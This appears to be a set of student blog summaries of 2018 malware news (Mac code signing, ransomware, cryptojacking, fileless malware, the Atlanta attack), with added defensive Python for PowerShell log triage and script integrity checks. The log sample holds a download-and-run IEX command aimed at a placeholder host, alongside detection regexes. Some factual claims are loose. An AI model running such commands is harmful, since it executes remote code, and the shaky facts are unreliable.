An Overlooked Way of Getting Malware Onto Macs

By: John Schnaufer

This article was about malware targeted against Macs that can be hidden in the Mac app store. The writer of the article says that although they found the vulnerability, no one has used it yet from what they can see.

This attack could be used by bypassing the code signing done before submission to the app store. Code signature checks, or code signing, are basically virtual security checks to make sure the app is safe and stable. It was noticed that the code only gets checked once, and then the signature doesn’t get checked again. This means that an attacker can make a clean app, submit it to the app store, and then, once it gets downloads from users, release an update infected with malware for the users to download. They can also steal or buy real code signatures and put them into their malicious app, and it has the possibility of getting published to the app store for everyone to download.

The writer of the main article says, “As a result of this research, Reed himself added code signature verification to Malwarebytes Mac products so they now perform a check every time they launch.” Reed works at the company Malwarebytes, and he put out an update to their software to check the code signature of app updates again. He even says, “A script kiddie could pull off something like this.” This shows how something should be done to fix this problem before others catch on and start infecting people’s computers with malware. This was released recently, so hopefully it gets fixed soon. I remember when I made my app for the app store, and I do not ever remember any checks being done to my updates after the initial release.


Source:

https://www.wired.com/story/mac-malware-hide-code-signing/


Cryptocurrency mining malware, Ransomware, and who is at risk

By: Chase Alexander

9/11/2018

It is no secret that hackers are trying to gain something when they carry out an attack on a target, usually money. However, the way that they do this can vary. It does not always mean that they are stealing credit card information or bank account logins. Another way to exploit hacked targets is through cryptocurrency mining malware. There is also malware that takes over a system until a ransom is paid. Today I would like to look at three things: ransomware, cryptocurrency mining malware, and who is at the greatest risk for these kinds of attacks.

First I am going to examine ransomware. This is an interesting case, as it has been around for quite some time now. The attack method dates all the way back to 2016. You would think that they would have been stopped by now, and you would be somewhat correct. Gone are the days of spreading ransomware through spam emails and outbreaks, where the philosophy was to cast a net as wide as possible and see what we catch. Today ransomware exists as a targeted attack on an individual or specific group. The goal of doing ransomware attacks this way is to carry out one strong attack, which will yield more reward than many weaker attacks. So how do they work? You gain entry into a system via weak Remote Desktop Protocol passwords. Escalate your privileges up to administrator. Use your new privileges to overcome security software. Spread your ransomware to encrypt files on the system. Finally, leave a message with the ultimatum, “If you want your files to be decrypted, contact via email or dark web website.” And then you wait. If they pay the ransom, then it is mission success for the hacker. If they do not pay the ransom, then it is almost inconsequential to the hacker. They will just move on to the next target and try again.

The other form of attack that is of interest is cryptocurrency mining malware. What this attack does is take over a machine and use it to mine cryptocurrency for a hacker. This attack is very different because it requires no interaction between the hacker and the hacked. Unlike the previous method, this one allows the hacker to try and remain undetected. For ransomware, the hacked has the choice to either give up their machine and data, or give in to the hacker. This method, though, gives no choice to the hacked. If they don’t hear their computer fan operating louder, then they will have no idea that they have been hacked. In addition to these facts, cryptocurrency is effectively an unregulated currency. This means that once the hacker has it, they are in the clear. If a hacker were to steal bank account credentials, there are still difficulties with actually attaining the currency inside of those bank accounts. A problem with this method, however, is that the profits are not immediate; they take time to accrue. If ransomware is successful, then profits are made instantly.

So who is at risk for these attacks? Ransomware attacks are targeted attacks. They go after one group or individual. That group or individual will have to give up money in order to secure themselves. It is as simple as this: if you do not have money or credit, you are at a very low risk of this attack. The goal of ransomware is to get ransom. A hacker will go after someone who they know will be able to pay ransom. They are not going to go after the poor because they have very little to offer. A cryptomining attack, however, can happen to anybody. You don’t need any money or credit; if you have a computer, it can be used for mining cryptocurrency. In terms of large targets, we can look at Vietnam. Last year malware cost Vietnam 12.3 trillion VND, or the equivalent of 540 million USD.


Sources:

  1. https://e.vnexpress.net/news/news/vietnam-vulnerable-as-new-cyber-security-threat-emerges-3804240.html
  2. https://nakedsecurity.sophos.com/2018/09/11/the-rise-of-targeted-ransomware/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+nakedsecurity+%28Naked+Security+-+Sophos%29
  3. https://www.zdnet.com/article/cryptocurrency-mining-malware-why-it-is-such-a-menace-and-where-its-going-next/

The Rise of Fileless malware

Over the last two years, there has been an uptick in the number of malware attacks that are fileless. This means that the malware is designed to not rely on or interact with the filesystem of the host machine. This is so it is relatively undetectable by file scanning, which is the common way to find malware. This rising trend will change how we deal with these kinds of malware threats. One of the changes to combat this threat is to turn to behavior-based detection strategies like “script block logging,” which will keep track of code that is executed, for someone to sift through and look for abnormalities.

Experts are predicting that fileless malware attacks will continue to rise as they did from 2016 to 2017 because of their success rate. Fileless attacks are more likely to be successful than file-based attacks by an order of magnitude (literally 10 times more likely), according to the 2017 “State of Endpoint Security Risk” report from Ponemon. The ratio of fileless to file-based attacks grew in 2017 and is forecasted to continue to grow this year. This goes to show that we need to constantly be adapting to different threats, because we know the hackers will.
– Ryne Krueger


https://www.technewsworld.com/story/85178.html
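
The “script block logging” approach mentioned in the post above, worked through as an added example that is not part of the original post: a Python triage pass over constructed PowerShell script block records (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) that flags the abnormalities a defender would sift for. The record shape, the sample script text, and the rule names are all constructed for this example.

```python
import base64
import re

# Constructed records in the shape of PowerShell script block log entries
# (Event ID 4104). The script text is invented for this example, not a capture.
ENCODED = base64.b64encode("Write-Host hi".encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    {"id": 4104, "text": "Get-ChildItem C:\\Reports | Sort-Object LastWriteTime"},
    {"id": 4104, "text": "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"},
    {"id": 4104, "text": "powershell -NoProfile -EncodedCommand " + ENCODED},
    {"id": 4103, "text": "pipeline record, not a script block"},
]

# Abnormalities worth a second look: code fetched from the network and run in
# memory, commands hidden behind base64, and attempts to suppress the console.
RULES = {
    "download-and-run": re.compile(r"(?i)\b(?:IEX|Invoke-Expression)\b.*(?:WebClient|DownloadString|Invoke-WebRequest)"),
    "encoded-command": re.compile(r"(?i)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})"),
    "hidden-console": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden|-(?:ep|executionpolicy)\s+bypass"),
}


def decode_encoded_command(blob: str) -> str:
    """-EncodedCommand carries base64 of UTF-16LE text; show it in the clear."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return "<undecodable>"


def triage(events):
    """Return (event index, rule name, note) for every script block that matches.

    Only 4104 records are examined: they carry the code that actually ran,
    which is what makes them useful against malware that never touches disk.
    """
    findings = []
    for index, event in enumerate(events):
        if event["id"] != 4104:
            continue
        for name, pattern in RULES.items():
            match = pattern.search(event["text"])
            if match is None:
                continue
            note = decode_encoded_command(match.group(1)) if name == "encoded-command" else ""
            findings.append((index, name, note))
    return findings


if __name__ == "__main__":
    for index, name, note in triage(SAMPLE_EVENTS):
        print(f"event {index}: {name}" + (f" -> {note}" if note else ""))
```

Script block logging must be switched on first (it is off by default); the rules above are a starting point for a human review, not a replacement for it.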


Crypto-jacking on Government Official Websites

About a month ago it was discovered that there was a vulnerability being exploited in a browser plug-in called Browsealoud. Browsealoud is a website plugin, developed by the company TextHelp, that adds speech, reading, and translation to websites in an effort to help those with dyslexia and other conditions. Hackers injected a crypto-mining script into a Java file within the Browsealoud library. The script would mine the currency ‘Monero’. Since the hackers attacked Browsealoud itself and not the individual websites, all the websites that were using Browsealoud (nearly 4000) were infected. Some of the websites included the UK’s ICO (Information Commissioner’s Office) and NHS (National Health Service) and the US federal judiciary. When someone visited a website using the plugin, the script would run and use the visitor’s CPU to begin mining.

Crypto-mining is something to be wary about, especially with the rise of Bitcoin and other cryptocurrencies. The hackers simply just wanted an easy way to mine more currency for themselves, whether or not it was legal. Their reason for doing this comes back to the acronym ‘MEECES’, which stands for money, ego, entertainment, cause, entrance, status. The attackers were just looking for some money in this case, because as of now it is unknown who injected the script. It was very fortunate, with the information as of now, that no information of the users who used the website was stolen, and their machines were only used to mine cryptocurrency.

Websites now should use more caution when implementing plugins on their website. Every company should have people testing for vulnerabilities within their services and should submit proof of this to their customers. In the future we need to become more aware of ways our websites and services can become vulnerable and the risks we take using them.

– Jordan Disciglio

Sources:
https://viraldocks.com/cryptojacking-attack-hits-4000-websites/

https://www.theguardian.com/technology/2018/feb/12/cryptojacking-attack-hits-australian-government-websites
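
As an added example, not part of the original post: Subresource Integrity (SRI) is the browser mechanism that lets a site pin the exact copy of a third-party script it vetted, so an altered copy served from the same URL is refused. The Python below computes the integrity value for a vetted copy and reproduces the browser's check against a modified copy; the script contents and the URL are constructed for this example.

```python
import base64
import hashlib
import hmac

# Constructed sample content: the vetted copy of a third-party script and a
# modified copy standing in for an upstream alteration (no real miner code).
ORIGINAL_JS = b"window.speakPage = function () { /* read the page aloud */ };\n"
MODIFIED_JS = ORIGINAL_JS + b"/* appended upstream, never vetted by the site */ startMining();\n"
SCRIPT_URL = "https://cdn.example.invalid/plugin/v1/plugin.js"  # constructed


def sri_digest(content: bytes, algorithm: str = "sha384") -> str:
    """Return the value a site pins in <script integrity="...">.

    SRI values have the form '<algorithm>-<base64 of the raw digest>'.
    """
    digest = hashlib.new(algorithm, content).digest()
    return f"{algorithm}-{base64.b64encode(digest).decode('ascii')}"


def check_integrity(fetched: bytes, integrity: str) -> bool:
    """Reproduce the browser's SRI check: hash the bytes actually fetched and
    compare with the pinned value. On mismatch the browser refuses to execute
    the script, so a change made upstream cannot run on the embedding site."""
    algorithm, _, _ = integrity.partition("-")
    if algorithm not in ("sha256", "sha384", "sha512"):
        return False  # unknown algorithm: fail closed rather than skip the check
    return hmac.compare_digest(sri_digest(fetched, algorithm).encode(), integrity.encode())


def script_tag(src: str, integrity: str) -> str:
    """The tag a site embeds once it has pinned the digest of the vetted copy."""
    return (f'<script src="{src}" integrity="{integrity}" '
            'crossorigin="anonymous"></script>')


if __name__ == "__main__":
    pinned = sri_digest(ORIGINAL_JS)
    print(script_tag(SCRIPT_URL, pinned))
    print("vetted copy runs:", check_integrity(ORIGINAL_JS, pinned))    # True
    print("modified copy runs:", check_integrity(MODIFIED_JS, pinned))  # False
```

The check only helps when the third party serves the script from a stable, versioned URL: a legitimate upstream update also changes the digest and is blocked until the site re-vets the new copy and updates the integrity value.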

City of Atlanta Victim of yet Another Cyber Attack

Early on March 22nd, several departments in Atlanta, Georgia were the target for a cyber attack. The attackers launched a ransomware attack, and demanded bitcoins as payment (over $50,000 USD).

Ransomware attacks are relatively new and became popular in 2017 with the widely feared WannaCry attack. Ransomware typically encrypts some of your files and locks you out of your computer, then demands a ransom to be paid (usually with Bitcoin, an anonymous cryptocurrency).

This attack had a widespread impact as it affected multiple departments in Atlanta. Administrators took down several websites and services while the attack was investigated by the FBI, DHS, Microsoft, and Cisco. While ATL airport was not directly affected, administrators also disabled its Wi-Fi and advised passengers that flight schedules may not be accurate and to verify information with their airline.

As an additional measure, city employees were directed not to turn on any devices in the building until the malware had been contained. Five days later on March 27th the first machines were powered back on. Administrators expect some machines to be infected and that employees will continue to work using other methods if their machines are affected.

Ransomware attacks historically have just been a means of pressuring victims into paying the ransom. Attackers usually are not looking to steal information in the process. In fact, if an attacker did want to steal information, it wouldn’t make much sense to tell the victim that their machine is infected. However, in the case of the Atlanta cyber attack, both employees and the public were advised to monitor their credit cards and bank accounts for any suspicious activity.

The investigation has shown that it doesn’t appear any information has been compromised. While the details of the attack have not been released, Rendition Infosec reported that the Atlanta government had been compromised by a previous cyber attack in April 2017. Microsoft had released critical patches over a month before the attack happened, but they were not installed. The attack lasted a little over a week, and statements from the city of Atlanta suggest that they were not aware the attack had happened in the first place. The identity of the attackers still remains unknown.


Jesse Roux

http://amp.wsbtv.com/www.wsbtv.com/news/local/atlanta/fbi-looking-into-citywide-computer-issues-in-atlanta/720045695?tnym

http://amp.wsbtv.com/www.wsbtv.com/www.wsbtv.com/news/local/hartsfield-jackson-takes-down-wi-fi-after-cyber-attack-on-city/720533019

http://searchsecurity.techtarget.com/news/252437715/Five-days-after-Atlanta-ransomware-attack-recovery-begins

https://www.renditioninfosec.com/2018/03/atlanta-government-was-compromised-in-april-2017-well-before-last-weeks-ransomware-attack/